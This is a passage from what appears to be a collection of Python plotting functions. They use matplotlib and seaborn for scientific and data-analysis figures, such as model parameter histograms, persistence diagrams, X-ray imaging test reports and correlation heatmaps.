stat_SF[oo][plotkey],stat_AGN[oo][plotkey],\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n\n plt.xscale('log')\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([0.00001,0.1])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # logUs\n plt.subplot(Nrows, Ncols, (4,6))\n\n bindefs = np.arange(-4.75, -0.25, 0.5)\n\n plotkey = 'logUs'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],parametercollection_AGN[oo][plotkey],\n stat_SF[oo][plotkey],stat_AGN[oo][plotkey],\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([-5,-0.5])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # xid\n plt.subplot(Nrows, Ncols, (7,9))\n\n bindefs = np.array([0.0, 0.2, 0.4, 0.6])\n\n plotkey = 'xid'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],parametercollection_AGN[oo][plotkey],\n stat_SF[oo][plotkey],stat_AGN[oo][plotkey],\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([-0.05,0.65])\n plt.ylabel(ylabel)\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # nh\n plt.subplot(Nrows, Ncols, (10,12))\n\n bindefs = 10**np.array([1.5, 2.5, 3.5, 4.5])\n\n plotkey = 'nh'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],parametercollection_AGN[oo][plotkey],\n stat_SF[oo][plotkey],stat_AGN[oo][plotkey],\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n plt.xscale('log')\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([10,1e5])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # COCOsol\n plt.subplot(Nrows, Ncols, (13,14))\n\n #bindefs = np.array([0.10, 0.14, 0.20, 0.27, 0.38, 0.52, 0.72, 1.00, 1.40])\n bindefs = np.arange(0.05,1.5,0.06)\n\n plotkey = 'COCOsol'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],None,\n stat_SF[oo][plotkey],None,\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([0.00,1.55])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # mup\n plt.subplot(Nrows, Ncols, (15,16))\n\n bindefs = np.array([0,200,400])\n\n plotkey = 'mup'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],None,\n stat_SF[oo][plotkey],None,\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([-10,410])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # alpha\n plt.subplot(Nrows, Ncols, (17,18))\n\n bindefs = np.array([-2.15,-1.85,-1.55,-1.25,-0.95])\n\n plotkey = 'alpha'\n Nbins = 10\n nm.plot_modelparametercollections_addhist(None,parametercollection_AGN[oo][plotkey],\n None,stat_AGN[oo][plotkey],\n SFcol,AGNcol,LW,bindefs=None,Nbins=Nbins)\n\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([-2.2,-0.9])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n plt.savefig(plotname_obj)\n plt.clf()\n plt.close('all')\n # if verbose: print(' - Successfully saved figure to file')\n if verbose: print('\\n done...')", "def plot_PDs(output_path,M_max,max_dim,normalized=False,output_name=None):\n plots_folder = os.path.join(output_path,'plots')\n if output_name is None: \n aux = ['PDs']\n input_file = os.path.join(output_path,'outputs_PDS.csv')\n else:\n aux = [output_name,'PDs']\n input_file = os.path.join(output_path,'%s_PDS.csv' % output_name)\n if normalized is True:\n aux.append('normalized')\n plot_file_name = '-'.join(aux)+'.png'\n plot_file_name = os.path.join(plots_folder,plot_file_name)\n\n \n data = pd.read_csv(input_file,index_col = 0)\n \n\n fig_size_aux = 15/(3-max_dim)\n plt.figure(figsize=(fig_size_aux,5))\n if(normalized):\n for i in range(1,max_dim+2):\n plt.subplot(1,max_dim+1,i, aspect='equal')\n plt.plot(data[data.dimH==i-1].birth.values/np.float(M_max),data[data.dimH==i-1].death.values/np.float(M_max),'bo',alpha=.3,label='dim %i'%(i-1))\n plt.xlim((0,1)); plt.ylim((0,1))\n frame = plt.legend(loc=4,frameon=True,title='normalized')\n frame = frame.get_frame()\n frame.set_edgecolor('black')\n plt.xlabel('birth'); plt.ylabel('death')\n plt.plot([0, 1], [0, 1], ls=\"--\", c=\".3\")\n plt.suptitle('Persistence Diagrams')\n plt.savefig(plot_file_name)\n print 'Saved PDs plots in %s'%plot_file_name\n else:\n for i in range(1,max_dim+2):\n plt.subplot(1,max_dim+1,i, aspect='equal')\n plt.plot(data[data.dimH==i-1].birth.values,data[data.dimH==i-1].death.values,'bo',alpha=.3,label='dim %i'%(i-1))\n plt.xlim((0,M_max)); plt.ylim((0,M_max))\n frame = plt.legend(loc=4,frameon=True)\n frame = frame.get_frame()\n frame.set_edgecolor('black')\n plt.xlabel('birth'); plt.ylabel('death')\n plt.plot([0, M_max], [0, M_max], ls=\"--\", c=\".3\")\n plt.suptitle('Persistence Diagrams')\n plt.savefig(plot_file_name)\n print 'Saved PDs plots in %s'%plot_file_name\n return()", "def PlotMA(df, show_plot=True):\n # Ensure 'Study' is in header.\n # TODO: Add code.\n # Obtain monthly means.\n df_ave = stats.MonthlyMean(df)\n # Get list of variables.\n var_list = set(df_ave.columns.get_level_values('Part B'))\n # Determine number of axes in the figure.\n n_var = len(var_list)\n n_row = np.int(np.around(np.sqrt(n_var)))\n if n_row**2 >= n_var:\n n_col = n_row\n else:\n n_col = n_row + 1\n fig, ax = plt.subplots(nrows=n_row, ncols=n_col, figsize=(16, 9))\n # Remove extra axes, if necessary.\n if n_row * n_col != n_var:\n n_empty = n_row * n_col - n_var\n for k in range(n_empty):\n ax[-1, -(1+k)].remove()\n # Initialize variables for updating axes.\n cur_row = 0\n cur_col = 0\n var_width = 0.9\n idx = np.arange(12)\n x_min = 0\n x_max = 12\n # Plot each variable.\n for var in var_list:\n df_var = df_ave.xs(var, level='Part B', axis=1)\n # Initialize parameters for current axis.\n y_min = np.min(df_var.values) * 0.95\n y_max = np.max(df_var.values) * 1.05\n col_var = df_var.columns\n bar_width = var_width / len(col_var)\n # Select current axis.\n if n_row == 1 and n_col == 1:\n ax_cur = ax\n elif n_row == 1:\n ax_cur = ax[cur_col]\n else:\n ax_cur = ax[cur_row, cur_col]\n # Plot study results for each variable.\n for c in col_var:\n idx_c = idx + 0.05 + col_var.get_loc(c) * bar_width\n val_c = df_var[c].values\n lab_c = '{} {}'.format(*c[:2])\n ax_cur.bar(idx_c, val_c, bar_width, label=lab_c, align='edge')\n # Set plot title.\n ax_cur.set_title('Monthly Averages of {}'.format(var))\n # Modify x-axis and y-axis.\n ax_cur.set_xticks(idx + 0.5)\n tick_labels = list(df_ave.index)\n ax_cur.set_xticklabels(tick_labels)\n label_c = set(df_var.columns.get_level_values('Part C'))\n _unit = df_var.columns.get_level_values('Units')\n _dtyp = df_var.columns.get_level_values('Data Type')\n unit_d = list(zip(_unit, _dtyp))\n combo_unit = [' '.join(i) for i in unit_d]\n label_u = set(combo_unit)\n ax_cur.set_ylabel('{} ({})'.format(r'/'.join(label_c),\n r'/'.join(label_u)))\n ax_cur.set_ylim(bottom=y_min, top=y_max)\n ax_cur.set_xlim(left=x_min, right=x_max)\n ax_cur.set_xlabel('Month')\n ax_cur.spines['right'].set_visible(False)\n ax_cur.spines['top'].set_visible(False)\n # Set legend.\n ax_cur.legend(title='Study, Part A')\n # Update current axis.\n cur_col += 1\n if cur_col >= n_col:\n cur_col = 0\n cur_row += 1\n # Adjust layout.\n plt.tight_layout()\n # Add figure notes.\n t = PlotChartNotes()\n if n_row * n_col != n_var:\n x_pos = (1 - n_empty / n_col) * 1.05\n y_pos = (1 / n_row) * 0.95\n plt.figtext(x_pos, y_pos, t, ha='left', va='top', wrap=True)\n else:\n plt.figtext(0.05, 0, t, ha='left', va='bottom', wrap=True)\n plt.subplots_adjust(bottom=0.2)\n # Show plot, if requested.\n if show_plot:\n plt.show()\n # Return figure and axes.\n return fig, ax", "def logit_model_plots(ds,Population = 'Population_%',Event_rate ='Event_rate',decile ='Band',Cumulative_Non_Event = 'Cumulative_Non_Event_%',Cumulative_Event= 'Cumulative_Event_%',sample_type ='Development'):\n \n import matplotlib.pyplot as plt\n fig, (ax1, ax2) = plt.subplots(1, 2,figsize=(15, 4))\n _= ax1.plot(plot_df[Cumulative_Non_Event],plot_df[Cumulative_Event])\n _= ax1.set_ylabel(Cumulative_Non_Event)\n _= ax1.set_title('Gini Curve : '+str(sample_type) +' sample')\n _= ax1.set_xlabel(Cumulative_Event)\n\n _= plot_df[Population].plot(kind='bar', color='b', width = 0.35,legend=True , label = Population)\n _= plot_df[Event_rate].plot(kind='line',color ='r', secondary_y=True,legend=True, label = Event_rate)\n _= ax2.set_xticklabels(plot_df[decile])\n _= ax2.set_ylim(0,plot_df[Event_rate].max()*0.15)\n _= ax2.right_ax.set_ylim(0,plot_df[Event_rate].max()*1.5)\n _= ax2.right_ax.set_ylabel(Event_rate)\n _= ax2.set_ylabel(Population)\n _= ax2.set_title('Decile Wise Event Rate : ' +str(sample_type) +' sample')\n _= ax2.set_xlabel(decile)\n plt.show()", "def ploter(self):\n if len(self.dataset[self.first_title]) != 2:\n print('plot is only avilable for two features')\n return\n x_axis = []\n y_axis = []\n for title in self.dataset:\n x_axis.append(self.dataset[title][0])\n y_axis.append(self.dataset[title][1])\n plt.plot(x_axis, y_axis, 'o')\n plt.show()", "def hotspot_fields_plot(self, results_dict, tas_bound=None, pr_bound=None):\n sorted_keys = [(f\"{period}_{season}_{variable}\"\n f\"_{project}_{results_dict['scenario']}\")\n for variable in self.variables\n for period in self.cfg[\"future_periods\"]\n for project in self.projects for season in self.seasons]\n sorted_keys = [\n sorted_keys[:len(sorted_keys) // 2],\n sorted_keys[len(sorted_keys) // 2:]\n ]\n ancestor_files_var = [[\n ancestor_file for ancestor_file in results_dict[\"ancestors\"]\n if f\"/{var}_\" in ancestor_file\n ] for var in self.variables]\n for ancestor_files, keys, variable in zip(ancestor_files_var,\n sorted_keys, self.variables):\n fig = plt.figure(figsize=(14.4, 3.4),\n constrained_layout=True,\n dpi=300)\n plt.gcf().subplots_adjust()\n # bound colorbar to abs(max) value on the map\n style = self.cb_bounds(variable, results_dict, keys,\n [tas_bound, pr_bound])\n # plot each panel\n fill, frame = self._hotspot_fields_plot_panels(\n results_dict, fig, keys, style)\n # plot figtexts\n self._hotspot_fields_plot_figtexts(results_dict['scenario'], frame)\n # plot line\n self._hotspot_fields_plot_line(fig, frame)\n # plot colorbar\n cbar = plt.colorbar(fill,\n plt.gcf().add_axes([0.25, 0.125, 0.5, 0.04]),\n orientation=\"horizontal\",\n extend=\"both\")\n if variable == \"pr\":\n cbar.set_label(\"%\")\n against_region = (\n f\"{self.cfg['region'][2]}$^o$ N-\"\n f\"{self.cfg['region'][3]}$^o$ N latitudinal belt\")\n else:\n cbar.set_label(\n self.formatter(str(results_dict[keys[-1]].units)))\n against_region = \"global\"\n\n # plot title and save\n self._hotspot_fields_plot_save(against_region, variable,\n results_dict['scenario'],\n ancestor_files)", "def make_N4255_plots(data_obj, aspect_corr=1.0, title_pages=False):\n\n print(\"Generating plots...\")\n\n #Create color maps\n cmap = plt.get_cmap('jet')\n cmap = plt.get_cmap('gray')\n\n #Call the function to create the title page of the pdf document\n plot_front_title(data_obj)\n\n #-----------------------------------------------------------------------#\n # Initialize the position variables for the text and graphs on the pdf. #\n #-----------------------------------------------------------------------#\n y0 = 0.9\n dy = [0.03, 0.025]\n\n ha = 'left'\n va = 'center'\n fs = 10\n dfs = 2\n\n # metric name value unc min\n xpos = [0.0, 0.4, 0.5, 0.75]\n yi = y0 - 0.1 # The position of the text on the y access, which is constantly updated as more text is added\n\n #-----------------------------------------------------------------------------------#\n # Plot the 'summary' page listing all the tests and the overall results - TEXT ONLY #\n #-----------------------------------------------------------------------------------#\n\n #Create the title of the page\n plot_overall_text(data_obj, yi, xpos, ha, va, fs)\n\n #Plot the overall results text of the first test, Penetration\n yi = yi - dy[0]\n plot_pen_text(data_obj, 1, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the first test, Organic Material Detection\n yi = yi - dy[0]\n plot_BSNR_text(data_obj, 2, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the third test, Spatial Resolution\n yi = yi - dy[0]\n plot_spatial_text(data_obj, 3, yi, yi - dy[1], xpos, ha, va, fs, dfs)\n yi = yi - dy[1] #Make sure the local yi is updated\n\n #Plot the overall results text of the fourth test, Dynamic Range\n yi = yi - dy[0]\n plot_dyn_text(data_obj, 4, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the fifth test, NEQ Noise\n yi = yi - dy[0]\n plot_noise_text(data_obj, 5, yi, dy, xpos, ha, va, fs, dfs)\n yi = yi - (dy[1] * 2) #Make sure to update yi, as it was only locally changed in 'plot_noise_text()'\n\n #Plot the overall results text of the sixth test, Flatness of field\n yi = yi - dy[0]\n plot_ff_text(data_obj, 6, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the seventh test, Image Extent\n yi = yi - dy[0]\n plot_extent_text(data_obj, 7, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the eighth test, Image Area\n yi = yi - dy[0]\n plot_area_text(data_obj, 8, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the ninth test, Aspect Ratio\n yi = yi - dy[0]\n plot_a_ratio_text(data_obj, 9, yi, xpos, ha, va, fs, dfs)\n\n #--------------------------------------------------#\n # Plot the footnotes for the overall results page. #\n #--------------------------------------------------#\n plot_overall_footnotes(xpos, ha, va, fs, dfs)\n\n\n #-----------------#\n # Plot the images #\n #-----------------#\n plot_images(data_obj, fs) #Plot the images to the pdf\n\n plot_image_footnotes(data_obj, xpos, ha, va, fs, dfs) #Add in the footnotes to the pdf\n\n\n #-------------------#\n # Penetration plots #\n #-------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 1: Penetration\")\n\n #Call the function to plot the Steel Penetration results to the pdf\n plot_steel_pen_N4255(data_obj, 1)\n\n\n #------------#\n # BSNR plots #\n #------------#\n if title_pages:\n new_title_page(data_obj, \"Test 2: Organic Material Detection\")\n\n # Call the function to plot the Organic Material Detection results to the pdf\n plot_BSNR(data_obj, 2, cmap)\n\n\n #--------------------#\n # Spatial Resolution #\n #--------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 3: Spatial Resolution\")\n\n # Call the function to plot the Spatial Resolution results to the pdf\n plot_spatial_res(data_obj, 3)\n\n #---------------#\n # Dynamic Range #\n #---------------#\n if title_pages:\n new_title_page(data_obj, \"Test 4: Dynamic Range\")\n\n # Call the function to plot the Dynamic Range results to the pdf\n plot_dynamic_range(data_obj, 4)\n\n #-------#\n # Noise #\n #-------#\n if title_pages:\n new_title_page(data_obj, \"Test 5: Noise (NEQ)\")\n\n # Call the function to plot the Noise (NEQ) results to the pdf\n plot_noise(data_obj, 5)\n\n #-------------------#\n # Flatness of field #\n #-------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 6: Flatness of Field\")\n\n # Call the function to plot the Flatness of Field results to the pdf\n plot_field_flatness(data_obj, 6)\n\n #--------------#\n # Image extent #\n #--------------#\n if title_pages:\n new_title_page(data_obj, \"Test 7: Image Extent\")\n\n # Call the function to plot the Image Extent results to the pdf\n plot_image_extent(data_obj, 7)\n\n\n #------------#\n # Image Area #\n #------------#\n if title_pages:\n fig = new_pdf_page(data_obj.pdf_obj)\n plt.axis('off')\n plt.text(0.5, 0.5, 'Test 8: Image Area', ha='center', va='center', fontsize=20)\n str1 = str(data_obj.image_area[0]) + ' by ' + str(data_obj.image_area[1]) + ' pixels'\n plt.text(0.5, 0.4, str1, ha='center', va='center', fontsize=12)\n\n #--------------#\n # Aspect Ratio #\n #--------------#\n if title_pages:\n new_title_page(data_obj, \"Test 9: Aspect Ratio\")\n\n #Call the function to plot the Aspect Ratio results to the pdf\n plot_aspect_ratio(data_obj, 9, cmap, aspect_corr)\n\n fig = new_pdf_page(data_obj.pdf_obj, open_fig=False)", "def covariance_plot(catl_pd, param_dict, proj_dict, plot_only_feat=False,\n fig_fmt='pdf', figsize=(10, 8), fig_number=2):\n file_msg = param_dict['Prog_msg']\n plot_dict = param_dict['plot_dict']\n ## Filename\n fname = os.path.join( proj_dict['figure_dir'],\n 'Fig_{0}_{1}_feature_covariance.{2}'.format(\n fig_number,\n param_dict['catl_str_fig'],\n fig_fmt))\n ##\n ## Paper Figure\n fname_paper = os.path.join( proj_dict['paper_fig_dir'],\n 'Figure_02.{0}'.format(fig_fmt))\n ## Renaming properties\n catl_pd_copy = catl_pd.copy()\n ## Dropping columns\n cols_drop = ['GG_pointing', 'GG_haloid_point', 'GG_mhalo_point', \n 'g_brightest', 'GG_r_rms']\n catl_pd_copy.drop(cols_drop, axis=1, inplace=True)\n ## Reordering columns\n mhalo_key = 'M_h'\n # Saving data from Halo mass\n gal_mhalo_arr = catl_pd_copy[mhalo_key].values\n # Removing Halo mass\n catl_pd_copy.drop(mhalo_key, axis=1, inplace=True)\n # Inserting it back again to the DataFrame\n catl_pd_copy.insert(0, mhalo_key, gal_mhalo_arr)\n ##\n ## Rearranging columns\n df_cols_new = [ 'M_h','dist_centre_group', 'M_r', 'logssfr', 'g_galtype',\n 'g_r', 'GG_mr_brightest', 'GG_mr_ratio',\n 'GG_M_r', 'GG_logssfr', 'GG_shape', 'GG_ngals',\n 'GG_rproj', 'GG_r_tot', 'GG_r_med', 'GG_sigma_v',\n 'GG_sigma_v_rmed', 'GG_M_group', 'GG_mdyn_rproj',\n 'GG_dist_cluster']\n catl_pd_copy = catl_pd_copy.loc[:, df_cols_new]\n # Plotting only features if applicable\n if plot_only_feat:\n feat_cols = param_dict['ml_args']._feature_cols()\n catl_pd_copy = catl_pd_copy.loc[:,feat_cols]\n ## Renaming\n catl_pd_copy.rename(columns=param_dict['feat_cols_dict'], inplace=True)\n ## Selecting certain columns only\n ## Figure details\n plt.clf()\n plt.close()\n fig = plt.figure(figsize=figsize)\n ax1 = fig.add_subplot(111, facecolor='white')\n fig.subplots_adjust(bottom=0.1, top=0.9, left=0.1, right=0.8,\n wspace=0.02, hspace=0.02)\n cax = fig.add_axes([0.30, 0.85, 0.30, 0.05])\n ## Correlation\n corr = catl_pd_copy.corr()\n # Generate a mask for the upper triangle\n mask = num.zeros_like(corr, dtype=num.bool)\n mask[num.triu_indices_from(mask)] = True\n # Generate a custom diverging colormap\n cmap = sns.diverging_palette(220, 10, as_cmap=True)\n # Draw the heatmat with the mask and correct aspect ratio\n g = sns.heatmap(corr, mask=mask, cmap=cmap, vmax=1.0, vmin=-1., center=0,\n square=True, linewidths=0.5, cbar=False, ax=ax1)\n cbar = fig.colorbar(g.get_children()[0], cax=cax, orientation='horizontal')\n cbar.set_label(r'$\\Leftarrow$ Correlation $\\Rightarrow$',\n fontsize=plot_dict['size_label'])\n cbar.ax.tick_params(labelsize=20)\n g.yaxis.set_tick_params(labelsize=25)\n g.xaxis.set_tick_params(labelsize=25)\n ##\n ## Saving figure\n if fig_fmt=='pdf':\n plt.savefig(fname, bbox_inches='tight')\n plt.savefig(fname_paper, bbox_inches='tight')\n else:\n plt.savefig(fname, bbox_inches='tight', dpi=400)\n plt.savefig(fname_paper, bbox_inches='tight', dpi=400)\n ##\n ##\n print('{0} Figure saved as: {1}'.format(file_msg, fname))\n print('{0} Paper Figure saved as: {1}'.format(file_msg, fname_paper))\n plt.clf()\n plt.close()", "def output_results(self, filename):\n\n self.data.plot(title='Result of applying {} onto data set'.format(self.transformations[-1]))\n plt.savefig(\"results/{}.png\".format(filename))\n plt.close()", "def visualizePredictions(testData,knn_predictions):\r\n testData.visualize.scatterPlot('Petal length','Petal width')\r\n testData.dataDict[testData.reference] = knn_predictions\r\n testData.visualize.scatterPlot('Petal length','Petal width')\r\n\r\n pass", "def make_F792_plots(data_obj, title_pages=False):\n\n print(\"Generating plots...\")\n\n # Create color maps\n cmap = plt.get_cmap('jet')\n cmap = plt.get_cmap('gray')\n\n # Call the\n plot_front_title(data_obj)\n\n # -----------------------------------------------------------------------#\n # Initialize the position variables for the text and graphs on the pdf. #\n # -----------------------------------------------------------------------#\n y0 = 0.9\n dy = [0.03, 0.025]\n\n ha = 'left'\n va = 'center'\n fs = 10\n dfs = 2\n\n # metric name value unc min\n xpos = [0.0, 0.4, 0.5, 0.75]\n yi = y0 - 0.1 # The position of the text on the y access, which is constantly updated as more text is added\n\n # -----------------------------------------------------------------------------------#\n # Plot the 'summary' page listing all the tests and the overall results - TEXT ONLY #\n # -----------------------------------------------------------------------------------#\n\n # Create the title of the page\n plot_overall_text(data_obj, yi, xpos, ha, va, fs)\n\n #Plot the overall results text of the first test, Steel Differentiation\n\n\n # Plot the overall results text of the second test, Penetration\n yi = yi - dy[0]\n plot_pen_text(data_obj, 2, yi, xpos, ha, va, fs, dfs)\n\n # Plot the overall results text of the third test, Organic Material Detection\n yi = yi - dy[0]\n plot_BSNR_text(data_obj, 3, yi, xpos, ha, va, fs, dfs)\n\n # Plot the overall results text of the fourth test, Spatial Resolution\n yi = yi - dy[0]\n plot_spatial_text(data_obj, 4, yi, yi - dy[1], xpos, ha, va, fs, dfs)\n yi = yi - dy[1] # Make sure the local yi is updated\n\n # Plot the overall results text of the fifth test, Dynamic Range\n yi = yi - dy[0]\n plot_dyn_text(data_obj, 5, yi, xpos, ha, va, fs, dfs)\n\n # Plot the overall results text of the sixth test, Noise\n yi = yi - dy[0]\n plot_noise_text(data_obj, 6, yi, dy, xpos, ha, va, fs, dfs)\n yi = yi - (dy[1] * 2) # Make sure to update yi, as it was only locally changed in 'plot_noise_text()'\n\n # --------------------------------------------------#\n # Plot the footnotes for the overall results page. #\n # --------------------------------------------------#\n plot_overall_footnotes(xpos, ha, va, fs, dfs, standard=\"ASTM F792\")\n\n\n #---------------------------------------------------------#\n # Plot the cropped and rotated images from the processing #\n #---------------------------------------------------------#\n plot_images(data_obj, fs) # Plot the images to the pdf\n\n plot_image_footnotes(data_obj, xpos, ha, va, fs, dfs) # Add in the footnotes to the pdf\n\n # NOTE: Above image plotting the same, with the same footnotes, for F792???\n\n #-----------------------------#\n # Steel differentiation plots #\n #-----------------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 1: Steel Differentiation\")\n\n #Call the function to plot the Steel Differentiation results to the pdf\n\n\n #-------------------#\n # Penetration plots #\n #-------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 2: Penetration\")\n\n # Call the function to plot the Steel Penetration results to the pdf\n #plot_steel_pen(data_obj, 2)\n\n #------------#\n # BSNR plots #\n #------------#\n if title_pages:\n new_title_page(data_obj, \"Test 3: Organic Material Detection\")\n\n # Call the function to plot the Organic Material Detection results to the pdf\n plot_BSNR(data_obj, 3, cmap)\n\n #--------------------#\n # Spatial Resolution #\n #--------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 4: Spatial Resolution\")\n\n # Call the function to plot the Spatial Resolution results to the pdf\n plot_spatial_res(data_obj, 4)\n\n #---------------#\n # Dynamic Range #\n #---------------#\n if title_pages:\n new_title_page(data_obj, \"Test 5: Dynamic Range\")\n\n # Call the function to plot the Dynamic Range results to the pdf\n plot_dynamic_range(data_obj, 5)\n\n #-------#\n # Noise #\n #-------#\n if title_pages:\n new_title_page(data_obj, \"Test 6: Noise (NEQ)\")\n\n # Call the function to plot the Noise (NEQ) results to the pdf\n plot_noise(data_obj, 6)\n\n fig = new_pdf_page(data_obj.pdf_obj, open_fig=False)", "def analyze_data(self, bandwith=1):\n data = {\"Topple Count\": self.topple_count, \"Fallen mass\": self.mass_fallen_count}\n print(data)\n\n self.plot()\n self.plot(type='mass')\n self.plot(type='topple')\n self.plot(type='histogram',bandwith=bandwith)\n self.plot(type='pdf',bandwith=bandwith)", "def plot(var):\n # MISSCHIEN KUNNEN WE HIER NOG IETS MEE\n # total_dead = len(train_data[\"Survived\"] == 0)\n # total_survived = len(train_data[\"Survived\"] == 1)\n # died = train_data[train_data[\"Survived\"] == 0][var].value_counts() / total_dead\n # survived = train_data[train_data[\"Survived\"] == 1][var].value_counts() / total_survived\n sns.set()\n sns.set_color_codes(\"pastel\")\n\n # order bars for family size variable\n if var == \"FamSize\":\n sns.barplot(x=var, y=\"Survived\", data=train_data, color=\"b\",\\\n capsize=.1, errwidth=.7, order=[\"alone\", 1, 2, 3, \"4 or more\"]).\\\n tick_params(labelsize=18)\n else:\n sns.barplot(x=var, y=\"Survived\", data=train_data, color=\"b\",\\\n capsize=.1, errwidth=1.1).tick_params(labelsize=18)\n\n # plot style properties\n ax = plt.gca()\n\n for ax in plt.gcf().axes:\n x = ax.get_xlabel()\n y = ax.get_ylabel()\n ax.set_xlabel(x, fontsize=20)\n ax.set_ylabel(y, fontsize=20)\n\n plt.title(\"Ratio of survivors for variable \" + str(var), fontsize=22)\n t = ax.title\n t.set_position([.5, 1.05])\n plt.ylim([0, 1])\n plt.subplots_adjust(bottom=.15, left=.15)\n plt.savefig(\"results/survived_\" + str(var) + \".png\", bbox_inches=\"tight\")\n\n plt.show()", "def plot_ppplot(obj1,sheet1,variable1,obj2,sheet2,variable2,title,opath):\n p1 = np.percentile(obj1.me[sheet1][variable1],range(0,101,1))\n p2 = np.percentile(obj2.me[sheet2][variable2],range(0,101,1))\n p1c = np.cumsum(np.array(p1))/np.cumsum(np.array(p1)).max()\n p2c = np.cumsum(np.array(p2))/np.cumsum(np.array(p2)).max()\n fig = plt.figure(figsize=(8,8),dpi=120)\n plt.scatter(p1c,p2c,color='#566c73',s=30)\n plt.plot([0,1],[0,1],color='red',alpha=0.3)\n plt.xlim(0,1)\n plt.ylim(0,1)\n plt.grid()\n plt.xlabel(sheet1+'_'+variable1)\n plt.ylabel(sheet2+'_'+variable2)\n plt.title(title)\n plt.savefig(opath+'.png')\n plt.close()", "def plot_observed_predictions(self):\n \n # Plot of X vs Y\n fig = plt.figure(figsize=(15,5))\n plt.subplot(1,3,1) \n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(self.phd_filter['estimated_positions'][k][0], self.phd_filter['estimated_positions'][k][1], 'bx')\n plt.xlabel(\"X\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n \n # Plot of time vs X\n plt.subplot(1,3,2)\n for k in self.phd_filter['estimated_positions'].keys(): \n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][0], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"X\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n\n # Plot of time vs Y\n plt.subplot(1,3,3)\n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][1], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n plt.show();", "def plot_gmm_preds(x, z, with_supervision, plot_id):\n plt.figure(figsize=(12, 8))\n plt.title('{} GMM Predictions'.format('Semi-supervised' if with_supervision else 'Unsupervised'))\n plt.xlabel('x_1')\n plt.ylabel('x_2')\n\n for x_1, x_2, z_ in zip(x[:, 0], x[:, 1], z):\n color = 'gray' if z_ < 0 else PLOT_COLORS[int(z_)]\n alpha = 0.25 if z_ < 0 else 0.75\n plt.scatter(x_1, x_2, marker='.', c=color, alpha=alpha)\n\n file_name = 'pred{}_{}.pdf'.format('_ss' if with_supervision else '', plot_id)\n save_path = os.path.join('.', file_name)\n plt.savefig(save_path)", "def plot_gmm_preds(x, z, with_supervision, plot_id):\n plt.figure(figsize=(12, 8))\n plt.title('{} GMM Predictions'.format('Semi-supervised' if with_supervision else 'Unsupervised'))\n plt.xlabel('x_1')\n plt.ylabel('x_2')\n\n for x_1, x_2, z_ in zip(x[:, 0], x[:, 1], z):\n color = 'gray' if z_ < 0 else PLOT_COLORS[int(z_)]\n alpha = 0.25 if z_ < 0 else 0.75\n plt.scatter(x_1, x_2, marker='.', c=color, alpha=alpha)\n\n file_name = 'pred{}_{}.pdf'.format('_ss' if with_supervision else '', plot_id)\n save_path = os.path.join('.', file_name)\n plt.savefig(save_path)", "def plot4(self, plog=False):\n\n probs = pd.read_csv(self.probfile)\n\n plt.rc('font', size=14)\n fig, ax = plt.subplots()\n plt.plot(self.ds.freq, self.snr, 'k-', alpha=0.5, zorder=1)\n\n # plot the SNR range to search across when finding snr_modes\n for idx, line in enumerate(self.ds.mode_id['f0']):\n w = np.exp(self.ds.mode_id['w0'][idx])\n plt.axvline(x=line-w, color='b', linestyle='-', alpha=0.4)\n plt.axvline(x=line+w, color='b', linestyle='-', alpha=0.4)\n\n # overplot the predicted SNR values at the modes\n plt.scatter(probs['f0'], probs['SNR_Kepler'], label='Kepler - 4yrs', alpha=1, zorder=2)\n plt.scatter(probs['f0'], probs['SNR_TESS365'], label='TESS - 1 yr', alpha=1, zorder=3)\n plt.scatter(probs['f0'], probs['SNR_TESS27'], label='TESS - 27 days', alpha=1, zorder=4)\n\n if plog:\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel(r'$\\nu$ / 